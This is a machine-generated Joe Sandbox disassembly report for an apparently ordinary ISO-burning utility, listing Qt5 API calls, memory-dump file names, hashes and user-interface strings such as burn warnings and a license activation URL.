                                                                                                                    • Part of subcall function 00007FF65372FA50: ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FA7E
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?setWindowTitle@QWidget@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FA8B
                                                                                                                    • Part of subcall function 00007FF65372FA50: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FA97
                                                                                                                    • Part of subcall function 00007FF65372FA50: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FAA2
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FAAF
                                                                                                                    • Part of subcall function 00007FF65372FA50: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FABB
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FADF
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FAED
                                                                                                                    • Part of subcall function 00007FF65372FA50: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FAF9
                                                                                                                    • Part of subcall function 00007FF65372FA50: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FB04
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FB12
                                                                                                                    • Part of subcall function 00007FF65372FA50: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FB1E
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FB42
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FB50
                                                                                                                    • Part of subcall function 00007FF65372FA50: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FB5C
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FB80
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FB8E
                                                                                                                    • Part of subcall function 00007FF65372FA50: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FB9A
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FBBE
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?setText@QLabel@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FBCC
                                                                                                                    • Part of subcall function 00007FF65372FA50: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FBD8
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FBFC
                                                                                                                    • Part of subcall function 00007FF65372FA50: ?setText@QAbstractButton@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF6537304C7), ref: 00007FF65372FC0A
                                                                                                                  • ?connectSlotsByName@QMetaObject@@SAXPEAVQObject@@@Z.QT5CORE ref: 00007FF6537304CA
                                                                                                                  • ??1QIcon@@QEAA@XZ.QT5GUI ref: 00007FF6537304D5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?set$Widget@@$String@@@$Label@@$?fromUtf8@$Name@Object@@$Object$Geometry@Rect@@Rect@@@$Flags@Qt@@@@@$Window$Button@@Text@$?translate@Application@@CoreWidget@@@$Type@$Flag@Pixmap@@Size@@$AbstractIcon@@$AlignmentAlignment@Concurrency::cancel_current_taskContents@ConversionEdit@@FrameFrame@@ImageLineModality@Pixmap@Pixmap@@@PushScaledSize@Size@@@Tool$?add?connect?object?resize@Box@@ComboFile@Icon@Icon@@@Length@MaximumMetaMinimumMode@1@Object@@@Qt@@@Shadow@Shadow@1@@Shape@Shape@1@@SlotsState@1@@Title@malloc
                                                                                                                  • String ID: $1setCancelVisible_waitForm(bool)$1setProgressBarProc_waitForm(int)$1setProgressBarVisible_waitForm()$:/chookIsoManager/Resources/cd_add.png$:/chookIsoManager/Resources/fon_sky.png$:/chookIsoManager/Resources/nav_refresh_blue.png$comboBox$iso_from_cd_dlgClass$label$label_2$label_3$label_5$label_6$lineEdit$pushButton$pushButton_2$toolButton_2$toolButton_3
                                                                                                                  • API String ID: 1074984424-2684384018
                                                                                                                  • Opcode ID: be6bd4621d57bab86484f7d529db416045ec98ef77fa79c5f0ed5c7602ffe856
                                                                                                                  • Instruction ID: d60568195194a0893bea71cfd0583829a7a1e4f14357e983d3a04bae278c3120
                                                                                                                  • Opcode Fuzzy Hash: be6bd4621d57bab86484f7d529db416045ec98ef77fa79c5f0ed5c7602ffe856
                                                                                                                  • Instruction Fuzzy Hash: 6D328F32A24A4297EB10CF61EC551A97362FB89F99F440135DA4EB7BA8DF3CD508C348
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?from$File$ArrayAscii_helper@Data@Typed$Dialog@@$Char@@@MessageStandardV0@@Widget@@$Data@@List$?tr@Array@@ByteFlags@MetaObject@@$?arg@?dispose@?setBox@@Box@@@@Button@Button@1@Char@@Data@1@@Latin1String@@1W421@@$?append@?critical@?replace@CaseDirectory@Qt@@@Sensitivity@String@@@Utf8@V1@0V1@@$?at@?current?exec@?get?information@?selectedDialogDialog@@@@@Empty@ExistingFiles@Index@LabelLabel@1@List@@Mode@Mode@1@@Option@StringString@@11@Text@V0@$$V2@1
                                                                                                                  • String ID: Boot Image saved as:%1$Cannot read from%1$Cannot write to%1$Error$Extract Boot Image To:$\BootDisk.IMG
                                                                                                                  • API String ID: 1875057155-1984645126
                                                                                                                  • Opcode ID: 5eefa101ba2af0bb9eba759bd2b5cacb1f1fdcb6869356236cacafbd78c27d81
                                                                                                                  • Instruction ID: dcb0b3bb9e7eee95949ac84938d43cf22a3895e7651e820c3741114faca99318
                                                                                                                  • Opcode Fuzzy Hash: 5eefa101ba2af0bb9eba759bd2b5cacb1f1fdcb6869356236cacafbd78c27d81
                                                                                                                  • Instruction Fuzzy Hash: 26226132E28A4296EB00CF60E8861AD7772FB95B55F891031E64EF3A64DF3CD549C784
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FF653718CDA), ref: 00007FF65371946A
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FF653718CDA), ref: 00007FF653719480
                                                                                                                  • ?warning@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS ref: 00007FF6537194A3
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537194AE
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537194B9
                                                                                                                  • ?text@QLineEdit@@QEBA?AVQString@@XZ.QT5WIDGETS(?,?,?,?,00000000,?,?,00007FF653718CDA), ref: 00007FF6537194D2
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,?,?,00007FF653718CDA), ref: 00007FF6537194E2
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FF653718CDA), ref: 00007FF653719502
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FF653718CDA), ref: 00007FF653719516
                                                                                                                  • ?warning@QMessageBox@@SA?AW4StandardButton@1@PEAVQWidget@@AEBVQString@@1V?$QFlags@W4StandardButton@QMessageBox@@@@W421@@Z.QT5WIDGETS(?,?,?,?,00000000,?,?,00007FF653718CDA), ref: 00007FF653719535
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,?,?,00007FF653718CDA), ref: 00007FF653719540
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,?,?,00007FF653718CDA), ref: 00007FF65371954B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@MessageStandardTyped$?warning@Box@@Box@@@@Button@Button@1@Flags@String@@1W421@@Widget@@$?text@Edit@@Line
                                                                                                                  • String ID: Cancel$No devices being found.$No media inserted.$Nothing to burn.$There is not enough free space on the media.$Warning
                                                                                                                  • API String ID: 963239914-2717367906
                                                                                                                  • Opcode ID: 3ea9b77d4bcde005291a7cee5bb6bb0070598c1547ea14c4eb6759c67e87749c
                                                                                                                  • Instruction ID: 8ded645a7ed6da6509f2a424696162a1035c5d776080ef38e451a0855c79d785
                                                                                                                  • Opcode Fuzzy Hash: 3ea9b77d4bcde005291a7cee5bb6bb0070598c1547ea14c4eb6759c67e87749c
                                                                                                                  • Instruction Fuzzy Hash: C2F14E32E24A8296E714DF21D8963B83762FB88F49F494131D61EE7664DF3CE459C384
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Char@@@$Widget@@$?from?hide@ArrayAscii_helper@Data@Object@@Typed$Network$?arg@Char@@Latin1MetaString@@@$Connection@Settings@@$?remove@?setText@$?connect@AccessConnectionLabel@@Manager@@PlainQt@@@Request@@Type@Url@@$?get@?show@?tr@?wizard@Edit@@Mode@0@@Object@@@Page@@Parent@ParsingReply@@Request@@@TextUrl@@@V1@@WizardWizard@@
                                                                                                                  • String ID: &trade;$&trade;$1replyFinished(QNetworkReply*)$1slotError(QNetworkReply::NetworkError)$1slotReadyRead()$2error(QNetworkReply::NetworkError)$2finished(QNetworkReply*)$2readyRead()$<b><i>%1</i>%2 registration has been successfully removed.$<i>%1</i>%2 license has been successfully deactivated and the license is available for re-using.$http://lsoft.net/act/activate.aspx?ID=%1
                                                                                                                  • API String ID: 1171166341-261734461
                                                                                                                  • Opcode ID: 28d45428ab3d41b82d8ce197686cf173a1892fc9c26f45695f5d877018b72f67
                                                                                                                  • Instruction ID: 84cb89c62764468898a2a6cb927153e53f4ccd4b52137bd2eab3a30d8aed3465
                                                                                                                  • Opcode Fuzzy Hash: 28d45428ab3d41b82d8ce197686cf173a1892fc9c26f45695f5d877018b72f67
                                                                                                                  • Instruction Fuzzy Hash: 7BD18132A28A82D2EB10DF60E8952A97362FB89F51F445132DA5EB3B74DF3CD458C744
                                                                                                                  APIs
                                                                                                                  • ??0QWizard@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF653749903
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF653749923
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65374992E
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653749940
                                                                                                                  • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FF653749951
                                                                                                                    • Part of subcall function 00007FF653769FB8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF65371257E), ref: 00007FF653769FD2
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749972
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749982
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749993
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537499A4
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF6537499B4
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??0QWizardPage@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752E08
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752E28
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752E33
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752E3E
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752E4C
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752E5D
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752E6E
                                                                                                                    • Part of subcall function 00007FF653752DC0: ?setTitle@QWizardPage@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752E92
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752E9D
                                                                                                                    • Part of subcall function 00007FF653752DC0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752EAE
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752ED8
                                                                                                                    • Part of subcall function 00007FF653752DC0: ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752EF4
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752F03
                                                                                                                    • Part of subcall function 00007FF653752DC0: ?arg@QString@@QEBA?AV1@AEBV1@HVQChar@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752F1F
                                                                                                                    • Part of subcall function 00007FF653752DC0: ?setSubTitle@QWizardPage@@QEAAXAEBVQString@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752F2C
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752F37
                                                                                                                    • Part of subcall function 00007FF653752DC0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,?), ref: 00007FF653752F42
                                                                                                                  • ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF6537499E7
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749A0A
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749A1A
                                                                                                                  • ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF653749A3D
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749A60
                                                                                                                  • ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF653749A80
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749AA3
                                                                                                                  • ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF653749AC3
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749AE6
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749AF6
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653749B06
                                                                                                                  • ?setPage@QWizard@@QEAAXHPEAVQWizardPage@@@Z.QT5WIDGETS ref: 00007FF653749B2E
                                                                                                                  • ?setStartId@QWizard@@QEAAXH@Z.QT5WIDGETS ref: 00007FF653749B3A
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF653749B4B
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF653749B5C
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF653749B6D
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF653749B7E
                                                                                                                  • ?setOption@QWizard@@QEAAXW4WizardOption@1@_N@Z.QT5WIDGETS ref: 00007FF653749B8F
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653749BA1
                                                                                                                  • ??0QIcon@@QEAA@AEBVQString@@@Z.QT5GUI ref: 00007FF653749BB3
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653749BBE
                                                                                                                  • ?setWindowIcon@QWidget@@QEAAXAEBVQIcon@@@Z.QT5WIDGETS ref: 00007FF653749BCB
                                                                                                                  • ?setWizardStyle@QWizard@@QEAAXW4WizardStyle@1@@Z.QT5WIDGETS ref: 00007FF653749BD9
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653749BEB
                                                                                                                  • ??0QPixmap@@QEAA@AEBVQString@@PEBDV?$QFlags@W4ImageConversionFlag@Qt@@@@@Z.QT5GUI ref: 00007FF653749C03
                                                                                                                  • ?setPixmap@QWizard@@QEAAXW4WizardPixmap@1@AEBVQPixmap@@@Z.QT5WIDGETS ref: 00007FF653749C15
                                                                                                                  • ??1QPixmap@@UEAA@XZ.QT5GUI ref: 00007FF653749C20
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653749C2B
                                                                                                                    • Part of subcall function 00007FF65374A0C0: ?tr@QMetaObject@@QEBA?AVQString@@PEBD0H@Z.QT5CORE ref: 00007FF65374A0E6
                                                                                                                    • Part of subcall function 00007FF653722A90: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF653722AAD
                                                                                                                    • Part of subcall function 00007FF653722A90: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE ref: 00007FF653722AC9
                                                                                                                    • Part of subcall function 00007FF653722A90: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FF653722AD6
                                                                                                                    • Part of subcall function 00007FF653722A90: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653722AE2
                                                                                                                    • Part of subcall function 00007FF65371F860: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF65371F87D
                                                                                                                    • Part of subcall function 00007FF65371F860: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FF65371F891
                                                                                                                  • ?setWindowTitle@QWidget@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF653749C75
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653749C80
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653749C8B
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653749C96
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF653749CC1
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF653749CCB
                                                                                                                  • ??1QIcon@@QEAA@XZ.QT5GUI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF653749CD6
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF653749CE0
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF653749CEB
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF653749CF5
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF653749CFF
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF653749D0A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$V0@@$?set$Wizard$Array@@ByteWizard@@$Option@Option@1@_Page@Page@@@$?fromChar@@@Object@@String@@@$ArrayAscii_helper@Data@MetaPage@@Title@TypedWidget@@Window$?append@?arg@Char@@Connection@Flags@Icon@@Latin1Pixmap@@Qt@@@@@Type@V1@@$?connect@?tr@ConnectionConversionFlag@Icon@Icon@@@ImagePixmap@Pixmap@1@Pixmap@@@Qt@@@StartStyle@Style@1@@Utf8@Widget@@@malloc
